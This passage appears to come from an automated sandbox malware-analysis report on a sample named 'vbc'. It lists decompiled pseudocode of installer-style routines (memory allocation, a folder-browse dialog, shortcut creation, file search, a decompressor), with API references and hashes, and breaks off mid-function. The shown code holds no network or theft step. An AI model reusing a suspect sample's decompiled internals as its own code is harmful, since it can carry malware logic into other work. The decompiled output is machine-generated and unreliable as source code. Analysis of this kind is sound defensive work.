                                                • Opcode Fuzzy Hash: 2645545cf012d76436299b14720adf7c6c685c4a3ccf69f6bfd84677ae74e8b1
                                                • Instruction Fuzzy Hash: C841AFB35003CCDFFB19AF66D891B4937B9FB04354F3B84A5E40AE6540D63994838BA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E731912BB() {
                                                				void* _t3;
                                                
                                                				_t3 = GlobalAlloc(0x40,  *0x7319506c +  *0x7319506c); // executed
                                                				return _t3;
                                                			}




                                                0x731912c5
                                                0x731912cb

                                                APIs
                                                • GlobalAlloc.KERNELBASE(00000040,?,731912DB,?,7319137F,00000019,731911CA,-000000A0), ref: 731912C5
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680955467.0000000073191000.00000020.00000001.01000000.00000004.sdmp, Offset: 73190000, based on PE: true
                                                • Associated: 00000004.00000002.680948427.0000000073190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.680961588.0000000073194000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.680965648.0000000073196000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_73190000_vbc.jbxd
                                                Similarity
                                                • API ID: AllocGlobal
                                                • String ID:
                                                • API String ID: 3761449716-0
                                                • Opcode ID: 3b972c4d652fc1df28efaa518ef93eb8ea00b4b341f1d3fba3ac640aa208a7ca
                                                • Instruction ID: e23ac5a44d3f0ca7f6342161b8a4a616d87ba5765f555872dcb9bb717421680e
                                                • Opcode Fuzzy Hash: 3b972c4d652fc1df28efaa518ef93eb8ea00b4b341f1d3fba3ac640aa208a7ca
                                                • Instruction Fuzzy Hash: C8B012B2A00040DFEE04EB65CC16F343354E700301F2D4010F608F0180C52048008534
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 78%
                                                			E0040498A(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				long _v16;
                                                				long _v20;
                                                				long _v24;
                                                				char _v28;
                                                				intOrPtr _v32;
                                                				long _v36;
                                                				char _v40;
                                                				unsigned int _v44;
                                                				signed int _v48;
                                                				WCHAR* _v56;
                                                				intOrPtr _v60;
                                                				intOrPtr _v64;
                                                				intOrPtr _v68;
                                                				WCHAR* _v72;
                                                				void _v76;
                                                				struct HWND__* _v80;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				intOrPtr _t82;
                                                				long _t87;
                                                				short* _t89;
                                                				void* _t95;
                                                				signed int _t96;
                                                				int _t109;
                                                				signed short _t114;
                                                				signed int _t118;
                                                				struct HWND__** _t122;
                                                				intOrPtr* _t138;
                                                				WCHAR* _t146;
                                                				unsigned int _t150;
                                                				signed int _t152;
                                                				unsigned int _t156;
                                                				signed int _t158;
                                                				signed int* _t159;
                                                				signed int* _t160;
                                                				struct HWND__* _t166;
                                                				struct HWND__* _t167;
                                                				int _t169;
                                                				unsigned int _t197;
                                                
                                                				_t156 = __edx;
                                                				_t82 =  *0x42c240; // 0x5d51a4
                                                				_v32 = _t82;
                                                				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x436000;
                                                				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                                				if(_a8 == 0x40b) {
                                                					E00405B81(0x3fb, _t146);
                                                					E004067C4(_t146);
                                                				}
                                                				_t167 = _a4;
                                                				if(_a8 != 0x110) {
                                                					L8:
                                                					if(_a8 != 0x111) {
                                                						L20:
                                                						if(_a8 == 0x40f) {
                                                							L22:
                                                							_v8 = _v8 & 0x00000000;
                                                							_v12 = _v12 & 0x00000000;
                                                							E00405B81(0x3fb, _t146);
                                                							if(E00405F14(_t186, _t146) == 0) {
                                                								_v8 = 1;
                                                							}
                                                							E0040653D(0x42b238, _t146);
                                                							_t87 = E0040690A(1);
                                                							_v16 = _t87;
                                                							if(_t87 == 0) {
                                                								L30:
                                                								E0040653D(0x42b238, _t146);
                                                								_t89 = E00405EB7(0x42b238);
                                                								_t158 = 0;
                                                								if(_t89 != 0) {
                                                									 *_t89 = 0;
                                                								}
                                                								if(GetDiskFreeSpaceW(0x42b238,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                									goto L35;
                                                								} else {
                                                									_t169 = 0x400;
                                                									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                									asm("cdq");
                                                									_v48 = _t109;
                                                									_v44 = _t156;
                                                									_v12 = 1;
                                                									goto L36;
                                                								}
                                                							} else {
                                                								_t159 = 0;
                                                								if(0 == 0x42b238) {
                                                									goto L30;
                                                								} else {
                                                									goto L26;
                                                								}
                                                								while(1) {
                                                									L26:
                                                									_t114 = _v16(0x42b238,  &_v48,  &_v28,  &_v40);
                                                									if(_t114 != 0) {
                                                										break;
                                                									}
                                                									if(_t159 != 0) {
                                                										 *_t159 =  *_t159 & _t114;
                                                									}
                                                									_t160 = E00405E58(0x42b238);
                                                									 *_t160 =  *_t160 & 0x00000000;
                                                									_t159 = _t160;
                                                									 *_t159 = 0x5c;
                                                									if(_t159 != 0x42b238) {
                                                										continue;
                                                									} else {
                                                										goto L30;
                                                									}
                                                								}
                                                								_t150 = _v44;
                                                								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                								_v44 = _t150 >> 0xa;
                                                								_v12 = 1;
                                                								_t158 = 0;
                                                								__eflags = 0;
                                                								L35:
                                                								_t169 = 0x400;
                                                								L36:
                                                								_t95 = E00404E27(5);
                                                								if(_v12 != _t158) {
                                                									_t197 = _v44;
                                                									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                										_v8 = 2;
                                                									}
                                                								}
                                                								if( *((intOrPtr*)( *0x433edc + 0x10)) != _t158) {
                                                									E00404E0F(0x3ff, 0xfffffffb, _t95);
                                                									if(_v12 == _t158) {
                                                										SetDlgItemTextW(_a4, _t169, 0x42b228);
                                                									} else {
                                                										E00404D46(_t169, 0xfffffffc, _v48, _v44);
                                                									}
                                                								}
                                                								_t96 = _v8;
                                                								 *0x434fa4 = _t96;
                                                								if(_t96 == _t158) {
                                                									_v8 = E0040140B(7);
                                                								}
                                                								if(( *(_v32 + 0x14) & _t169) != 0) {
                                                									_v8 = _t158;
                                                								}
                                                								E004044BB(0 | _v8 == _t158);
                                                								if(_v8 == _t158 &&  *0x42d258 == _t158) {
                                                									E004048E3();
                                                								}
                                                								 *0x42d258 = _t158;
                                                								goto L53;
                                                							}
                                                						}
                                                						_t186 = _a8 - 0x405;
                                                						if(_a8 != 0x405) {
                                                							goto L53;
                                                						}
                                                						goto L22;
                                                					}
                                                					_t118 = _a12 & 0x0000ffff;
                                                					if(_t118 != 0x3fb) {
                                                						L12:
                                                						if(_t118 == 0x3e9) {
                                                							_t152 = 7;
                                                							memset( &_v76, 0, _t152 << 2);
                                                							_v80 = _t167;
                                                							_v72 = 0x42d268;
                                                							_v60 = E00404CE0;
                                                							_v56 = _t146;
                                                							_v68 = E0040657A(_t146, 0x42d268, _t167, 0x42ba40, _v12);
                                                							_t122 =  &_v80;
                                                							_v64 = 0x41;
                                                							__imp__SHBrowseForFolderW(_t122);
                                                							if(_t122 == 0) {
                                                								_a8 = 0x40f;
                                                							} else {
                                                								__imp__CoTaskMemFree(_t122);
                                                								E00405E0C(_t146);
                                                								_t125 =  *((intOrPtr*)( *0x434f10 + 0x11c));
                                                								if( *((intOrPtr*)( *0x434f10 + 0x11c)) != 0 && _t146 == 0x440800) {
                                                									E0040657A(_t146, 0x42d268, _t167, 0, _t125);
                                                									if(lstrcmpiW(0x432ea0, 0x42d268) != 0) {
                                                										lstrcatW(_t146, 0x432ea0);
                                                									}
                                                								}
                                                								 *0x42d258 =  *0x42d258 + 1;
                                                								SetDlgItemTextW(_t167, 0x3fb, _t146);
                                                							}
                                                						}
                                                						goto L20;
                                                					}
                                                					if(_a12 >> 0x10 != 0x300) {
                                                						goto L53;
                                                					}
                                                					_a8 = 0x40f;
                                                					goto L12;
                                                				} else {
                                                					_t166 = GetDlgItem(_t167, 0x3fb);
                                                					if(E00405E83(_t146) != 0 && E00405EB7(_t146) == 0) {
                                                						E00405E0C(_t146);
                                                					}
                                                					 *0x433ed8 = _t167;
                                                					SetWindowTextW(_t166, _t146);
                                                					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                					_push(1);
                                                					E00404499(_t167);
                                                					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                					_push(0x14);
                                                					E00404499(_t167);
                                                					E004044CE(_t166);
                                                					_t138 = E0040690A(8);
                                                					if(_t138 == 0) {
                                                						L53:
                                                						return E00404500(_a8, _a12, _a16);
                                                					} else {
                                                						 *_t138(_t166, 1);
                                                						goto L8;
                                                					}
                                                				}
                                                			}













































                                                0x0040498a
                                                0x00404990
                                                0x00404996
                                                0x004049a3
                                                0x004049b1
                                                0x004049b4
                                                0x004049bc
                                                0x004049c2
                                                0x004049c2
                                                0x004049ce
                                                0x004049d1
                                                0x00404a3f
                                                0x00404a46
                                                0x00404b1d
                                                0x00404b24
                                                0x00404b33
                                                0x00404b33
                                                0x00404b37
                                                0x00404b41
                                                0x00404b4e
                                                0x00404b50
                                                0x00404b50
                                                0x00404b5e
                                                0x00404b65
                                                0x00404b6c
                                                0x00404b6f
                                                0x00404bab
                                                0x00404bad
                                                0x00404bb3
                                                0x00404bb8
                                                0x00404bbc
                                                0x00404bbe
                                                0x00404bbe
                                                0x00404bda
                                                0x00000000
                                                0x00404bdc
                                                0x00404bdf
                                                0x00404bed
                                                0x00404bf3
                                                0x00404bf4
                                                0x00404bf7
                                                0x00404bfa
                                                0x00000000
                                                0x00404bfa
                                                0x00404b71
                                                0x00404b73
                                                0x00404b77
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00404b79
                                                0x00404b79
                                                0x00404b86
                                                0x00404b8b
                                                0x00000000
                                                0x00000000
                                                0x00404b8f
                                                0x00404b91
                                                0x00404b91
                                                0x00404b9a
                                                0x00404b9c
                                                0x00404ba1
                                                0x00404ba4
                                                0x00404ba9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00404ba9
                                                0x00404c06
                                                0x00404c10
                                                0x00404c13
                                                0x00404c16
                                                0x00404c1d
                                                0x00404c1d
                                                0x00404c1f
                                                0x00404c1f
                                                0x00404c24
                                                0x00404c26
                                                0x00404c2e
                                                0x00404c35
                                                0x00404c37
                                                0x00404c42
                                                0x00404c42
                                                0x00404c37
                                                0x00404c52
                                                0x00404c5c
                                                0x00404c64
                                                0x00404c7f
                                                0x00404c66
                                                0x00404c6f
                                                0x00404c6f
                                                0x00404c64
                                                0x00404c84
                                                0x00404c89
                                                0x00404c8e
                                                0x00404c97
                                                0x00404c97
                                                0x00404ca0
                                                0x00404ca2
                                                0x00404ca2
                                                0x00404cae
                                                0x00404cb6
                                                0x00404cc0
                                                0x00404cc0
                                                0x00404cc5
                                                0x00000000
                                                0x00404cc5
                                                0x00404b6f
                                                0x00404b26
                                                0x00404b2d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00404b2d
                                                0x00404a4c
                                                0x00404a55
                                                0x00404a6f
                                                0x00404a74
                                                0x00404a7e
                                                0x00404a85
                                                0x00404a91
                                                0x00404a94
                                                0x00404a97
                                                0x00404a9e
                                                0x00404aa6
                                                0x00404aa9
                                                0x00404aad
                                                0x00404ab4
                                                0x00404abc
                                                0x00404b16
                                                0x00404abe
                                                0x00404abf
                                                0x00404ac6
                                                0x00404ad0
                                                0x00404ad8
                                                0x00404ae5
                                                0x00404af9
                                                0x00404afd
                                                0x00404afd
                                                0x00404af9
                                                0x00404b02
                                                0x00404b0f
                                                0x00404b0f
                                                0x00404abc
                                                0x00000000
                                                0x00404a74
                                                0x00404a62
                                                0x00000000
                                                0x00000000
                                                0x00404a68
                                                0x00000000
                                                0x004049d3
                                                0x004049e0
                                                0x004049e9
                                                0x004049f6
                                                0x004049f6
                                                0x004049fd
                                                0x00404a03
                                                0x00404a0c
                                                0x00404a0f
                                                0x00404a12
                                                0x00404a1a
                                                0x00404a1d
                                                0x00404a20
                                                0x00404a26
                                                0x00404a2d
                                                0x00404a34
                                                0x00404ccb
                                                0x00404cdd
                                                0x00404a3a
                                                0x00404a3d
                                                0x00000000
                                                0x00404a3d
                                                0x00404a34

                                                APIs
                                                • GetDlgItem.USER32(?,000003FB), ref: 004049D9
                                                • SetWindowTextW.USER32 ref: 00404A03
                                                • SHBrowseForFolderW.SHELL32(?), ref: 00404AB4
                                                • CoTaskMemFree.OLE32(00000000), ref: 00404ABF
                                                • lstrcmpiW.KERNEL32(Call,0042D268,00000000,?,?), ref: 00404AF1
                                                • lstrcatW.KERNEL32 ref: 00404AFD
                                                • SetDlgItemTextW.USER32 ref: 00404B0F
                                                  • Part of subcall function 00405B81: GetDlgItemTextW.USER32 ref: 00405B94
                                                  • Part of subcall function 004067C4: CharNextW.USER32(?), ref: 00406827
                                                  • Part of subcall function 004067C4: CharNextW.USER32(?), ref: 00406836
                                                  • Part of subcall function 004067C4: CharNextW.USER32(?), ref: 0040683B
                                                  • Part of subcall function 004067C4: CharPrevW.USER32(?,?), ref: 0040684E
                                                • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 00404BD2
                                                • MulDiv.KERNEL32 ref: 00404BED
                                                  • Part of subcall function 00404D46: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                                                  • Part of subcall function 00404D46: wsprintfW.USER32 ref: 00404DF0
                                                  • Part of subcall function 00404D46: SetDlgItemTextW.USER32 ref: 00404E03
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: A$Call
                                                • API String ID: 2624150263-209694386
                                                • Opcode ID: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
                                                • Instruction ID: a81e8b8b6ddc8ea4f7a7a45a10ce21cc850824e22f7b82fba9ad49fead82d7d1
                                                • Opcode Fuzzy Hash: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
                                                • Instruction Fuzzy Hash: CBA191B1900208ABDB119FA6DD45AAFB7B8EF84314F10803BF601B62D1D77C9A41CB6D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 67%
                                                			E004021AA(void* __eflags) {
                                                				signed int _t52;
                                                				void* _t56;
                                                				intOrPtr* _t60;
                                                				intOrPtr _t61;
                                                				intOrPtr* _t62;
                                                				intOrPtr* _t64;
                                                				intOrPtr* _t66;
                                                				intOrPtr* _t68;
                                                				intOrPtr* _t70;
                                                				intOrPtr* _t72;
                                                				intOrPtr* _t74;
                                                				intOrPtr* _t76;
                                                				intOrPtr* _t78;
                                                				intOrPtr* _t80;
                                                				void* _t83;
                                                				intOrPtr* _t91;
                                                				signed int _t101;
                                                				signed int _t105;
                                                				void* _t107;
                                                
                                                				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
                                                				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
                                                				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
                                                				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
                                                				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
                                                				_t52 =  *(_t107 - 0x20);
                                                				 *(_t107 - 0x50) = _t52 & 0x00000fff;
                                                				_t101 = _t52 & 0x00008000;
                                                				_t105 = _t52 >> 0x0000000c & 0x00000007;
                                                				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
                                                				if(E00405E83( *((intOrPtr*)(_t107 - 0x44))) == 0) {
                                                					E00402DA6(0x21);
                                                				}
                                                				_t56 = _t107 + 8;
                                                				__imp__CoCreateInstance(0x4085f0, _t83, 1, 0x4085e0, _t56);
                                                				if(_t56 < _t83) {
                                                					L14:
                                                					 *((intOrPtr*)(_t107 - 4)) = 1;
                                                					_push(0xfffffff0);
                                                				} else {
                                                					_t60 =  *((intOrPtr*)(_t107 + 8));
                                                					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x408600, _t107 - 0x38);
                                                					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
                                                					if(_t61 >= _t83) {
                                                						_t64 =  *((intOrPtr*)(_t107 + 8));
                                                						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
                                                						if(_t101 == _t83) {
                                                							_t80 =  *((intOrPtr*)(_t107 + 8));
                                                							 *((intOrPtr*)( *_t80 + 0x24))(_t80, 0x441000);
                                                						}
                                                						if(_t105 != _t83) {
                                                							_t78 =  *((intOrPtr*)(_t107 + 8));
                                                							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                                                						}
                                                						_t66 =  *((intOrPtr*)(_t107 + 8));
                                                						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
                                                						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
                                                						if( *_t91 != _t83) {
                                                							_t76 =  *((intOrPtr*)(_t107 + 8));
                                                							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
                                                						}
                                                						_t68 =  *((intOrPtr*)(_t107 + 8));
                                                						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
                                                						_t70 =  *((intOrPtr*)(_t107 + 8));
                                                						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
                                                						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                							_t74 =  *((intOrPtr*)(_t107 - 0x38));
                                                							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
                                                						}
                                                						_t72 =  *((intOrPtr*)(_t107 - 0x38));
                                                						 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                					}
                                                					_t62 =  *((intOrPtr*)(_t107 + 8));
                                                					 *((intOrPtr*)( *_t62 + 8))(_t62);
                                                					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                						_push(0xfffffff4);
                                                					} else {
                                                						goto L14;
                                                					}
                                                				}
                                                				E00401423();
                                                				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t107 - 4));
                                                				return 0;
                                                			}






















                                                0x004021b3
                                                0x004021bd
                                                0x004021c7
                                                0x004021d1
                                                0x004021dc
                                                0x004021df
                                                0x004021f9
                                                0x004021fc
                                                0x00402202
                                                0x00402205
                                                0x0040220f
                                                0x00402213
                                                0x00402213
                                                0x00402218
                                                0x00402229
                                                0x00402231
                                                0x004022e8
                                                0x004022e8
                                                0x004022ef
                                                0x00402237
                                                0x00402237
                                                0x00402246
                                                0x0040224a
                                                0x0040224d
                                                0x00402253
                                                0x00402261
                                                0x00402264
                                                0x00402266
                                                0x00402271
                                                0x00402271
                                                0x00402276
                                                0x00402278
                                                0x0040227f
                                                0x0040227f
                                                0x00402282
                                                0x0040228b
                                                0x0040228e
                                                0x00402294
                                                0x00402296
                                                0x004022a0
                                                0x004022a0
                                                0x004022a3
                                                0x004022ac
                                                0x004022af
                                                0x004022b8
                                                0x004022be
                                                0x004022c0
                                                0x004022ce
                                                0x004022ce
                                                0x004022d1
                                                0x004022d7
                                                0x004022d7
                                                0x004022da
                                                0x004022e0
                                                0x004022e6
                                                0x004022fb
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004022e6
                                                0x004022f1
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?), ref: 00402229
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: CreateInstance
                                                • String ID:
                                                • API String ID: 542301482-0
                                                • Opcode ID: 58fea544f8465b7ca695cd277db4a94267474b575ac50a9b019070cedb53bd32
                                                • Instruction ID: 5977cb51530078b600b156af0050786de557c4b464dd586e6a5beaa7a0440451
                                                • Opcode Fuzzy Hash: 58fea544f8465b7ca695cd277db4a94267474b575ac50a9b019070cedb53bd32
                                                • Instruction Fuzzy Hash: A7411571A00208EFCF40DFE4C989E9D7BB5BF49348B20456AF905EB2D1DB799981CB94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 39%
                                                			E0040290B(short __ebx, short* __edi) {
                                                				void* _t21;
                                                
                                                				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
                                                					E00406484( *((intOrPtr*)(_t21 - 0xc)), _t8);
                                                					_push(_t21 - 0x2b0);
                                                					_push(__edi);
                                                					E0040653D();
                                                				} else {
                                                					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
                                                					 *__edi = __ebx;
                                                					 *((intOrPtr*)(_t21 - 4)) = 1;
                                                				}
                                                				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t21 - 4));
                                                				return 0;
                                                			}




                                                0x00402923
                                                0x0040293e
                                                0x00402949
                                                0x0040294a
                                                0x00402a94
                                                0x00402925
                                                0x00402928
                                                0x0040292b
                                                0x0040292e
                                                0x0040292e
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: FileFindFirst
                                                • String ID:
                                                • API String ID: 1974802433-0
                                                • Opcode ID: e3c555fdbd57f1008fac0fd93a6eb0fb110785489bc5405dabc14b2674c5a242
                                                • Instruction ID: 3f6fbcf0fd4d311cdd608d5f72697756ed96b8559223cd5d9f1c4d92bc61f1b3
                                                • Opcode Fuzzy Hash: e3c555fdbd57f1008fac0fd93a6eb0fb110785489bc5405dabc14b2674c5a242
                                                • Instruction Fuzzy Hash: 3CF08271A04105EFD701DBA4ED49AAEB378FF14314F60417BE116F21D0E7B88E159B29
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 79%
                                                			E00406D85(signed int __ebx, signed int* __esi) {
                                                				signed int _t396;
                                                				signed int _t425;
                                                				signed int _t442;
                                                				signed int _t443;
                                                				signed int* _t446;
                                                				void* _t448;
                                                
                                                				L0:
                                                				while(1) {
                                                					L0:
                                                					_t446 = __esi;
                                                					_t425 = __ebx;
                                                					if( *(_t448 - 0x34) == 0) {
                                                						break;
                                                					}
                                                					L55:
                                                					__eax =  *(__ebp - 0x38);
                                                					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                					__ecx = __ebx;
                                                					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                					__ebx = __ebx + 8;
                                                					while(1) {
                                                						L56:
                                                						if(__ebx < 0xe) {
                                                							goto L0;
                                                						}
                                                						L57:
                                                						__eax =  *(__ebp - 0x40);
                                                						__eax =  *(__ebp - 0x40) & 0x00003fff;
                                                						__ecx = __eax;
                                                						__esi[1] = __eax;
                                                						__ecx = __eax & 0x0000001f;
                                                						if(__cl > 0x1d) {
                                                							L9:
                                                							_t443 = _t442 | 0xffffffff;
                                                							 *_t446 = 0x11;
                                                							L10:
                                                							_t446[0x147] =  *(_t448 - 0x40);
                                                							_t446[0x146] = _t425;
                                                							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
                                                							L11:
                                                							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
                                                							_t446[0x26ea] =  *(_t448 - 0x30);
                                                							E004074F4( *(_t448 + 8));
                                                							return _t443;
                                                						}
                                                						L58:
                                                						__eax = __eax & 0x000003e0;
                                                						if(__eax > 0x3a0) {
                                                							goto L9;
                                                						}
                                                						L59:
                                                						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
                                                						__ebx = __ebx - 0xe;
                                                						_t94 =  &(__esi[2]);
                                                						 *_t94 = __esi[2] & 0x00000000;
                                                						 *__esi = 0xc;
                                                						while(1) {
                                                							L60:
                                                							__esi[1] = __esi[1] >> 0xa;
                                                							__eax = (__esi[1] >> 0xa) + 4;
                                                							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                								goto L68;
                                                							}
                                                							L61:
                                                							while(1) {
                                                								L64:
                                                								if(__ebx >= 3) {
                                                									break;
                                                								}
                                                								L62:
                                                								if( *(__ebp - 0x34) == 0) {
                                                									goto L182;
                                                								}
                                                								L63:
                                                								__eax =  *(__ebp - 0x38);
                                                								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                								__ecx = __ebx;
                                                								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                								__ebx = __ebx + 8;
                                                							}
                                                							L65:
                                                							__ecx = __esi[2];
                                                							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
                                                							__ebx = __ebx - 3;
                                                							_t108 = __ecx + 0x4084d4; // 0x121110
                                                							__ecx =  *_t108;
                                                							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
                                                							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
                                                							__ecx = __esi[1];
                                                							__esi[2] = __esi[2] + 1;
                                                							__eax = __esi[2];
                                                							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
                                                							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
                                                								goto L64;
                                                							}
                                                							L66:
                                                							while(1) {
                                                								L68:
                                                								if(__esi[2] >= 0x13) {
                                                									break;
                                                								}
                                                								L67:
                                                								_t119 = __esi[2] + 0x4084d4; // 0x4000300
                                                								__eax =  *_t119;
                                                								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
                                                								_t126 =  &(__esi[2]);
                                                								 *_t126 = __esi[2] + 1;
                                                							}
                                                							L69:
                                                							__ecx = __ebp - 8;
                                                							__edi =  &(__esi[0x143]);
